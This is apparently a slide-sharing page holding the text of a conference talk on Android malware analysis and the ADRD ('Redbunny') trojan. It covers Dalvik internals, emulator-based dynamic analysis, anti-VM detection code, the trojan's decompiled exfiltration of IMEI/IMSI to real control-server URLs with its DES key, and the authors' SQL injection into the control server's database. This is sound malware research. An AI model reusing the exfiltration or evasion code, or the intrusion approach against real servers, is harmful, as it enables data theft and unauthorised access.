 
All Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioAll Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioLin Sun
 
Mist.io @ AWSUGGR
Mist.io @ AWSUGGRMist.io @ AWSUGGR
Mist.io @ AWSUGGRunweb.me
 
KSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxKSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxNashet Ali
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionFelipe Prado
 
Denis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityDenis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityАліна Шепшелей
 
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"Inhacking
 
Android crash debugging
Android crash debuggingAndroid crash debugging
Android crash debuggingAshish Agrawal
 
KDD 2016 Streaming Analytics Tutorial
KDD 2016 Streaming Analytics TutorialKDD 2016 Streaming Analytics Tutorial
KDD 2016 Streaming Analytics TutorialNeera Agarwal
 
Dmitriy D1g1 Evdokimov - DBI Intro
Dmitriy D1g1 Evdokimov - DBI IntroDmitriy D1g1 Evdokimov - DBI Intro
Dmitriy D1g1 Evdokimov - DBI IntroDefconRussia
 
Container Runtime Security with Falco
Container Runtime Security with FalcoContainer Runtime Security with Falco
Container Runtime Security with FalcoMichael Ducy
 
Android things introduction - Development for IoT
Android things introduction - Development for IoTAndroid things introduction - Development for IoT
Android things introduction - Development for IoTBartosz Kosarzycki
 

Similar to Wtf is happening_inside_my_android_phone_public (20)

Android Development Tools
Android Development ToolsAndroid Development Tools
Android Development Tools
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
 
Automated malware analysis
Automated malware analysisAutomated malware analysis
Automated malware analysis
 
Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!
 
Ato2019 weave-services-istio
Ato2019 weave-services-istioAto2019 weave-services-istio
Ato2019 weave-services-istio
 
Weave Your Microservices with Istio
Weave Your Microservices with IstioWeave Your Microservices with Istio
Weave Your Microservices with Istio
 
All Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioAll Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istio
 
Mist.io @ AWSUGGR
Mist.io @ AWSUGGRMist.io @ AWSUGGR
Mist.io @ AWSUGGR
 
KSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxKSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptx
 
Android Development Tools
Android Development ToolsAndroid Development Tools
Android Development Tools
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
 
Denis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityDenis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application security
 
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
 
Android crash debugging
Android crash debuggingAndroid crash debugging
Android crash debugging
 
KDD 2016 Streaming Analytics Tutorial
KDD 2016 Streaming Analytics TutorialKDD 2016 Streaming Analytics Tutorial
KDD 2016 Streaming Analytics Tutorial
 
Dmitriy D1g1 Evdokimov - DBI Intro
Dmitriy D1g1 Evdokimov - DBI IntroDmitriy D1g1 Evdokimov - DBI Intro
Dmitriy D1g1 Evdokimov - DBI Intro
 
Container Runtime Security with Falco
Container Runtime Security with FalcoContainer Runtime Security with Falco
Container Runtime Security with Falco
 
Android Internals
Android InternalsAndroid Internals
Android Internals
 
Android things introduction - Development for IoT
Android things introduction - Development for IoTAndroid things introduction - Development for IoT
Android things introduction - Development for IoT
 

Wtf is happening_inside_my_android_phone_public

  • 1. ! Lost in translation WTF is happening inside my Android Phone Ok Cancel
  • 2. 8:30 PM Contents Contents Android System Static Analysis Dynamic Analysis Reversing Red Bunny Conclusion Cancel
  • 4. 8:30 PM DALVIK VM - Register-based virtual machine - It uses its own bytecode, not Java bytecode. - Run on a slow CPU with little RAM. - Run on an operating system without swap space. - Optimized for memory efficiency. - Dex class file format.
  • 5. 8:30 PM Dex file format header string_ids type_ids proto_ids field_ids method_ids class_defs data
  • 6. 8:30 PM Analysis Environment Tools Case-sensitive file system :D Android SDK Android NDK Android source code Eclipse Apktool, Dex2jar, JD-GUI Android Emulator
  • 7. 8:30 PM Example .java/jd-gui Compiler dex2jar .java/source .dex/dexdump .smali/baskmali baskmali
  • 8. 8:30 PM Anti-analysis Examples: - Easy: Use a.class and A.class as class names: the file will be hidden on case-insensitive file systems. - Medium: Optimize/ofuscate the code with ProGuard. - Hard: Modify bytecode to break reversing tools (be sure that it still runs on Dalvik.) if self.__value_type >= VALUE_SHORT Ej: androguard-a1: ... elif self.__value_type == VALUE_ARRAY : ... elif self.__value_type == VALUE_BYTE : Insert value type ... VALUE_ANNOTATION elif self.__value_type == VALUE_NULL : ... elif self.__value_type == VALUE_BOOLEAN : ... else : raise(“oops”)
  • 9. 8:30 PM Dynamic Analysis Basic: - Create an Android Virtual Device. -> $android (SDK) - $emulator -port 5560 @virtual-device -tcpdump capture.pcap - $adb install app.apk - $adb shell monkey -v -p package.app 700 - $adb shell logcat -d && $adb shell logcat -b events -d (radio also) - $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum
  • 10. 8:30 PM Make it more real - Simulate phone events: Send SMS: echo sms send +34656566789 test | nc localhost 5554 D/AT ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c Simulate calls: $echo gsm call +34656566789 |nc localhost 5554 $echo gsm accept +34656566789 |nc localhost 5554 $echo gsm cancel +34656566789 |nc localhost 5554 Change GPS coordinates: $echo geo fix -82.411629 28.054553|nc localhost 5554
  • 11. 8:30 PM Dynamic Analysis Advance: - Create you own system image and modify the java classes to log the program flow. Example, framework/base/core/java/android/os/ Process.java
  • 12. 8:30 PM Compiling Android Kernel modules $git clone git://android.git.kernel.org/kernel/common $git branch -a $git checkout --track -b android-goldfish-2.6.29 origin/android- goldfish-2.6.29 $adb pull /proc/config.gz ./;gunzip config.gz; mv config .config Edit and Add CONFIG_MODULES=y (disable by default on emulator kernel) $emulator -avd armv5y -kernel /tmp/zImage
  • 13. 8:30 PM System-Call Hooking $grep sys_call_table System.map
  • 14. 8:30 PM Anti-VM - Detecting the emulator is very easy: DEVICE_ID: String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID); boolean emulator = TextUtils.isEmpty(id); Solution: Change secure->android_id on data/data/com.android.providers.settings/databases/settings.db IMSI: TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE); String imsi = manager.getSubscriberId(); (00000... on emulator) Solution: Patch the emulator binary (search for +CGSN string) or the emulator source code (external/ qemu/telephony/android_modem.c).
  • 15. 8:30 PM More Anti-VM - LocationManager.NETWORK_PROVIDER -> IllegalArgumentException - Detect ADB stuff.. process, network, debug enabled... - /proc/cpuinfo - > Hardware : Goldfish - vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn’t change) (Thanks Ehooo) - Qemu specific detection (Google) Solution: Patch emulator, Qemu, system hooking...
  • 16. 8:30 PM Alternatives to Android Emulator - http://www.android-x86.org/ . Supports VMware - Use a real phone... Slower
  • 17. 8:30 PM Attack Vectors - Alternative markets, repacked applications. -SMS, MMS vulnerabilities, Fuzzing!!!. - Wireless, Bluetooth Drivers - NFC - System componentes: Webkit, sound library, Kernel.
  • 18. 8:30 PM Third party software Source: http://android.git.kernel.org/
  • 19. 8:30 PM ADRD aka Redbunny - "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" ( http://blog.aegislab.com/index.php? op=ViewArticle&articleId=75&blogId=1 ) ! Notification - "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]" - Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011: * Name: com.beautyfullivewallpaper * Date: Feb. 2, 2011, 1:49 p.m. - Also known as HongTouTou
  • 20. 8:30 PM Detection - Permission list:  * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS.. - Cipher module/library calls (DES):  * init        Ljavax/crypto/Cipher;    Lcom/xxx/yyy/ddda;    decrypt - Function calls to retrieve the IMSI/IMEI codes:  * IMEI:    getDeviceId       Lcom/xxx/yyy/MyService;    onCreate  * IMSI:    getSubscriberId     Lcom/xxx/yyy/MyService;    onCreate - HTTP Requests (GET and POST):  * String str8 = "http://adrd.taxuan.net/index.aspx?im=" + (String)localObject;  * adrd.xiaxiab.com     POST    /index.aspx? im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace 3ed65910991f4dbd438af
  • 21. 8:30 PM Detection - Sends http requests through a proxy:  * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");  * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default- proxy", localHttpHost); - Services:  * com.xxx.yyy.MyService  * .beauty.Beauty - Intents:  * android.intent.action.BOOT_COMPLETED **** -> Boots at system startup  * android.intent.action.PHONE_STATE  * android.net.conn.CONNECTIVITY_CHANGE
  • 22. 8:30 PM Analysis I Service module (MyService): Sets a Proxy for GET/POST and - Sets the preferred apn 1 HTTP specially crafted headers - Runs each 12 hours (UA, MIME types) - Looks for specific APN network : 2 “CMWAP” || “UNIWAP” Cipher data module Send data to adrd.taxuan.net/ public static String encrypt/decrypt 3 index.aspx?im=%s: Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding"); + IMEI + IMSI Loop + Netway (preferred APN) + Decrypt response + iversion + Switch(cmd) It depends on the + oversion 4 + 0 Do nothing + 1 adad.StartGo() adad.StartGo() + 2 ParseO 5 Sends http://adrd.xiaxiab.com/pic.aspx?im= + 3 UpdateHelper() +encrypt(IMEI+IMSI Parses the big list of ulrs/referers B#1#963a_w1|http://59.173.12.105/g/ UpdateHelper installs the update g.ashx?w=963a_w1 apk 6 BBBB.Go() -> Retrieves search lists of wap.baidu.com FixUrls(): Send random requests adding BAIDU_WISE_UID and HTTP_HEADERS. ParseO(): parse server response (number, flags, tags..): Sends log data to control servers 6 T213607170863|12345|+ -10086+ abc -597| [ ' 6
  • 23. 8:30 PM Analysis II - Following the encryption routines, the DES key is found…: this.kk = "48734154"; * UpdateHelper class: public class UpdateHelper { private static String savefilepath = "/myupdate.apk"; private Context ct; private int netway; * Benefit from visits to the content (Baidu) and bandwidth consumption (China Mobile && Unicom) and also SMS charges. - Server URLs (there are more): http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA - We want to know more!!
  • 24. 8:30 PM Control Servers - adrd.xiaxiab.com from an eagle view: * Microsoft-IIS/6.0 * Debug Enabled (Displaying .NET errors and backtraces) * Hidden paths to the .Net/aspx application * ALL is Chinese! (WTF!?!"·$%&/(?) - Possible vector attacks: * HTTP functions + DES key + pyDes = "legal" HTTP Requests (at least for the adrd server)
  • 25. 8:30 PM Control Servers - First results: Search * Exceptions in chinese. Google Translate is your friend * Errors at .NET (it didn't generate any html list/table, or view to use for data displaying) * We got a successful Sql injection after the last ciphered parameter :D). * User without admin privileges. * Permissions to run Backups + Shared Resources = Timeout * Other possibilities: + 1: Create a temporal db, with just one table each time, dump paginated rows and run backups. Problem: Complex to do and complex to rebuild the original DB (Also the lang didn't help) + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES at the http logs, and it's not usual to log all the db queries for performance reason.
  • 26. 8:30 PM Database Information - All the scheme obtained: list of Tables, Fields, types, stored procedures - IMEI/IMSIs list (at least some of them), logs, keywords, Baidu accounts - The main stored procedure affected by the sql injection retrieves the URL of myupdate.apk, that points to adrd.xiaxiab.com/down.aspx ! * Parameters: @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int * Store procedure: --if (@netwap=2) select 'T-1|T11' --select 'T3http://adrd.xiaxiab.com/down.aspx' --select 'T213607170863|12345|+ -10086+ abc -597| [ ' --else --select 'T013607170863' * Looks that they were considering the netwap (based on the mobile operator) as a criteria to send commands * TX (where X seems to be a command type) * 13607170863 is a phone number located at Wuhan
  • 27. 8:30 PM Database Scheme t_baiduHourPercent: autoid, mHour, mPercent t_ : myear, mmonth, mday, mhour, total t_baidukeyword: keyword, viewcount t_ : way, flag t_baidukeywordflash: keyword t_baiduOrtherKey: keyword, viewcount t_ : keyword, flag t_baidupwd: id, way, username, pwd t_ _wap: keyword, flag t_baiduwayname: way, wayname t_ _wap_back : keyword, flag t_keywordResult: id, keyword, link, head, flag t_androidtemplog: id, imsi, way, result, createtime t_ _wap_back : keyword, flag t_keywordResult20100601: id, keyword, link, head, flag t_ : flag t_keywordResult20101108: id, keyword, link, head, flag t_ : keyword, createtime t_baiduHourPercent20101012: autoid, mHour, mPercent t_androidtemplog_backup: id, imsi, way, result, createtime t_ _wap: keyword, createtime t_androidtemperrlog: id, compresslog, decompresslog, createtime t_ : keyword, createtime t_androidtemplog_backup201101: id, imsi, way, result, createtime t_ _wap: keyword, createtime t_android : id, imei, imsi, logs, ip, createtime, netway t_android : , , , , createtime t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid t_ : way, maxClick, minClick, leaveTotalClick, leaveEffectClick t_ _wap_20100323: keyword, createtime t_ _wap_20100722 : keyword, createtime
  • 28. 8:30 PM Myupdate.apk - It uses the main package of the ADRD family xxx.yyy. - The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS.. - Looks like a google reader - It adds a local sqlite DB (keyword storage). go_g1_sms: id, keyword, type, flag go_g2_sms: id, keyword, keyword2 - SMSObserver: * Replaces keywords on SMS’s. * Sends SMS!
  • 29. 8:30 PM Samples Package name Md5 Adrd Ver IVer com.beautyfullivewallpaper 4556a687a2845bf4dfac62c594938cf3 adrd.zt.cw.1 6 com.yodesoft.yohandcar 6783cee889fa64df68af58a56ff6e362 adrd.zt.2 6 com.binaryloft.live.winter aa5216da617839e818d83d8185da42b0 adrd.zt.jtj.2 6 com.magicwach.rdefense 839c37f3a2c8d31561d28f619a2a712e adrd.zt.cw.3 6 com.tat.livewallpaper.dandelion 5192ad05597e7a148f642be43f6441f6 adrd.zt.cw.4 6 com.classicnerds.livewallpaper.HK b72724d8fc0f633194dcc3bd28eec026 adrd.zt.cw.5 7 fishnoodle.night_city a01ba26a34e55f71873782348ff5e074 adrd.zt.dxm.6 7 com.appspot.swisscodemonkeys.steam cdfca19bf212adf3292e4fe677fe46a6 adrd.zt.cw.7 7 kr.mobilesoft.yxplayer e3cc6c7af0d83fe322116254c01cf720 adrd.zt.cw.8 7 com.labgency.wallpapers.waves 7d764347a0b0c9d11160d7a7684bf02b adrd.zt.dxm.8 7 com.laucass.andromax 627f41c8f8e7ab007641c4a0c1d8ce1b adrd.zt.cw.9 7 com.digitalchocolate.androidrollergapp 71c0a67daa544450d7c620a48cc059b0 drd.zt.cw.12 7 proscio.wallpaper.shamroc e09782d35d72a769dc7454adb6d8e2e9 adrd.zt.cw.15 7  com.tt.yy f2596f8f3c52381318f62d1ab161c284 ?? ??
  • 30. 8:30 PM Infections g Geolocation
  • 31. 8:30 PM Infections g Infections by operator +20K different IMSIs Other affected operators: Far EasT one Peoples Telephone Company Hutchison 3G PCCW Mobile Sunday Hong Kong Telecom Smart One Mobile
  • 32. 8:30 PM Thank You ! Questions? Ok Cancel @jaimeblascob @PabloForThePPL